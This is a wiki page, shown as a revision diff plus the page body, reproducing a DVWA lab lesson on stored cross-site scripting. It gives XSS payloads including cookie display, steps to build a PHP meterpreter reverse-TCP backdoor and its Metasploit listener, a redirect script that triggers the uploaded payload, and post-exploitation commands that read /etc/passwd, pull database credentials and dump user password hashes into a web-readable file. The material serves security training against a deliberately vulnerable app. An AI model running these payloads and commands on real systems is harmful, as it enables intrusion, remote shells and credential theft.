Difference between revisions of "DVWA: XSS"

From OnnoWiki
Jump to navigation Jump to search
Line 70: Line 70:
 
         This is a powerful exploit because a user could use SET to create Malicious cloned website and place in here.
 
         This is a powerful exploit because a user could use SET to create Malicious cloned website and place in here.
 
             e.g., Social Engineering Toolkit (SET): Lesson 3: Create Malicious Weblink, Install Virus, Capture Forensic Images
 
             e.g., Social Engineering Toolkit (SET): Lesson 3: Create Malicious Weblink, Install Virus, Capture Forensic Images
 +
 +
==XSS Stored COOKIE Exploit Test==
 +
 +
* Reset Database DVWA, supaya XSS yang pernah dilakukan tidak muncul lagi.
 +
* Klik > XSS (Stored)
 +
* Pada Nama isi "Test 3"
 +
* Pada Message isi "<script>alert(document.cookie)</script>"
 +
* Klik > Sign Guestbook
 +
 +
 +
    Below is the cookie/session that the webserver establishes with the current browser session.
 +
    An attacker could easily modify this XSS script to send the cookie to a remote location instead of displaying it.
 +
    Image if this was a bank website. Every time a user logs in their cookie information could be sent to a remote location.
 +
 +
 +
==Build PHP msfpayload==
 +
 +
 +
    mkdir -p /root/backdoor
 +
    cd /root/backdoor
 +
    msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=4444 R > FORUM_BUG.php
 +
    ls -l FORUM_BUG.php
 +
 +
 +
    Select "Upload" from the left navigation menu.
 +
    Click Browse
 +
 +
Start msfconsole
 +
 +
 +
        msfconsole
 +
 +
use exploit/multi/handler
 +
set PAYLOAD php/meterpreter/reverse_tcp
 +
set LHOST 192.168.1.105
 +
set LPORT 4444
 +
exploit
 +
 +
 +
==XSS Stored window.location Exploit Test==
 +
 +
* Reset Database DVWA, supaya XSS yang pernah dilakukan tidak muncul lagi.
 +
* Klik > XSS (Stored)
 +
Name: Test 4
 +
Message:
 +
 +
    <script>window.location="http://192.168.1.106/dvwa/hackable/uploads/FORUM_BUG.php" </script>
 +
        Replace 192.168.1.106 with the IP Address obtain from Fedora 14 in (Section 3, Step 3).
 +
 +
Click Sign Guestbook
 +
Click OK when the Test 1 Message is displayed
 +
 +
shell
 +
 +
    Establishes a "sh" shell.
 +
 +
tail /etc/passwd
 +
 +
    This produces a potential prospect list for a ssh brute force attack
 +
 +
    whoami
 +
        Displays the name of the user.
 +
    grep apache /etc/passwd
 +
        The goal of this command is obtaining the home directory for the apache username.
 +
    find /var/www/* -print | grep config
 +
        Here I am wanting to find all the configuration files in the /var/www directory.
 +
 +
 +
 +
    grep "db_" /var/www/html/dvwa/config/config.inc.php
 +
        This produces the database name, username, and password information to log into the mysql database.
 +
    echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD
 +
        This command produces a table list of the dvwa database.
 +
    echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD
 +
        This command describes the columns of the users table in the dvwa datase.
 +
    echo "select user,password from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
 +
        This command displays the user and password information for each user in the dvwa.users table.
 +
 +
 +
    echo "<pre>" >> /var/www/html/dvwa/hackable/uploads/xss.html
 +
        Place the html <pre> tag in the xss.html file.
 +
        The <pre> is used as a pre-formatter.
 +
    echo "select user,password from dvwa.users;" | mysql -uroot -pdvwaPASSWORD >> /var/www/html/dvwa/hackable/uploads/xss.html
 +
        Place user and password for the dvwa.users table in the xss.html file.
 +
    echo "</pre>" >> /var/www/html/dvwa/hackable/uploads/xss.html
 +
        Place the close html </pre> tag in the xss.html file.
 +
    echo "<br>Your Name<br>" >> /var/www/html/dvwa/hackable/uploads/xss.html
 +
        Replace the string "Your Name" with your actual name.
 +
    date >> /var/www/html/dvwa/hackable/uploads/xss.html
 +
 +
 +
 +
 +
    On BackTrack, place the below URI in Firefox
 +
        http://192.168.1.106/dvwa/hackable/uploads/xss.html
 +
            Replace the above IP address with the IP Address obtained in (Section 3, Step 3).
  
 
==Referensi==
 
==Referensi==
  
 
* http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson9/index.html
 
* http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson9/index.html

Revision as of 09:30, 28 May 2017

sumber: http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson9/index.html

Tujuan

  • Test a basic cross site scripting (XSS) attack
  • Test an iframe cross site scripting (XSS) attack
  • Test a cookie cross site scripting (XSS) attack
  • Create a php/meterpreter/reverse_tcp payload
  • Start the php/meterpreter/reverse_tcp listener
  • Upload the PHP payload to the DVWA Upload screen
  • Test a PHP Payload cross site scripting (XSS) attack


Di sisi DVWA

Cek IP

ifconfig


Fix Stored Cross Site Scripting (XSS) Comment Box

Edit index.php 

cd /var/www/html/DVWA-1.9/vulnerabilities/xss_s/
vi index.php

Search dengan keyword mtxMessage Ubah maxlength=50

<textarea name=\"mtxMessage\" cols=\"50\" rows=\"3\" maxlength=\"50\"></textarea>

menjadi maxlength=250

<textarea name=\"mtxMessage\" cols=\"50\" rows=\"3\" maxlength=\"250\"></textarea>

Di sisi Kali Linux

Cek IP Kali Linux

ifconfig -a

Enable Javascript di Browser

Buka Firefox
Preferences > Content > Uncheck - Block pop-up windows

Masuk ke DVWA

  • Login
  • DVWA Security > Low

XSS Stored Basic Exploit Test

  • Klik > XSS (Stored)
  • Pada Name isi "Test 1"
  • Pada Message isi "<script>alert("This is a XSS Exploit Test")</script>"
  • Klik > Sign Guestbook

XSS Stored IFRAME Exploit Test

  • Reset Database DVWA, supaya XSS yang pernah dilakukan tidak muncul lagi.
  • Klik > XSS (Stored)
  • Pada Nama isi "Test 2"
  • Pada Message isi "<iframe src="http://www.cnn.com"></iframe>"
  • Klik > Sign Guestbook

Tampak bahwa CNN muncul di bawah "Test 2" . 

       This is a powerful exploit because a user could use SET to create Malicious cloned website and place in here.
           e.g., Social Engineering Toolkit (SET): Lesson 3: Create Malicious Weblink, Install Virus, Capture Forensic Images

XSS Stored COOKIE Exploit Test

  • Reset Database DVWA, supaya XSS yang pernah dilakukan tidak muncul lagi.
  • Klik > XSS (Stored)
  • Pada Nama isi "Test 3"
  • Pada Message isi "<script>alert(document.cookie)</script>"
  • Klik > Sign Guestbook


   Below is the cookie/session that the webserver establishes with the current browser session.
   An attacker could easily modify this XSS script to send the cookie to a remote location instead of displaying it.
   Image if this was a bank website. Every time a user logs in their cookie information could be sent to a remote location.


Build PHP msfpayload

   mkdir -p /root/backdoor
   cd /root/backdoor
   msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=4444 R > FORUM_BUG.php
   ls -l FORUM_BUG.php



   Select "Upload" from the left navigation menu.
   Click Browse

Start msfconsole 


       msfconsole

use exploit/multi/handler set PAYLOAD php/meterpreter/reverse_tcp set LHOST 192.168.1.105 set LPORT 4444 exploit


XSS Stored window.location Exploit Test

  • Reset Database DVWA, supaya XSS yang pernah dilakukan tidak muncul lagi.
  • Klik > XSS (Stored)

Name: Test 4 Message: 

   <script>window.location="http://192.168.1.106/dvwa/hackable/uploads/FORUM_BUG.php" </script>
       Replace 192.168.1.106 with the IP Address obtain from Fedora 14 in (Section 3, Step 3).

Click Sign Guestbook Click OK when the Test 1 Message is displayed

shell 

   Establishes a "sh" shell.

tail /etc/passwd 

   This produces a potential prospect list for a ssh brute force attack

   whoami
       Displays the name of the user.
   grep apache /etc/passwd
       The goal of this command is obtaining the home directory for the apache username.
   find /var/www/* -print | grep config
       Here I am wanting to find all the configuration files in the /var/www directory.



   grep "db_" /var/www/html/dvwa/config/config.inc.php
       This produces the database name, username, and password information to log into the mysql database.
   echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD
       This command produces a table list of the dvwa database.
   echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD
       This command describes the columns of the users table in the dvwa datase.
   echo "select user,password from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
       This command displays the user and password information for each user in the dvwa.users table.


echo "

" >> /var/www/html/dvwa/hackable/uploads/xss.html
        Place the html <pre> tag in the xss.html file.
        The <pre> is used as a pre-formatter.
    echo "select user,password from dvwa.users;" | mysql -uroot -pdvwaPASSWORD >> /var/www/html/dvwa/hackable/uploads/xss.html
        Place user and password for the dvwa.users table in the xss.html file.
    echo "

" >> /var/www/html/dvwa/hackable/uploads/xss.html Place the close html tag in the xss.html file. 

   echo "
Your Name
" >> /var/www/html/dvwa/hackable/uploads/xss.html
       Replace the string "Your Name" with your actual name.
   date >> /var/www/html/dvwa/hackable/uploads/xss.html




   On BackTrack, place the below URI in Firefox
       http://192.168.1.106/dvwa/hackable/uploads/xss.html
           Replace the above IP address with the IP Address obtained in (Section 3, Step 3).

Referensi

Retrieved from "https://onnocenter.or.id/wiki/index.php?title=DVWA:_XSS&oldid=48200"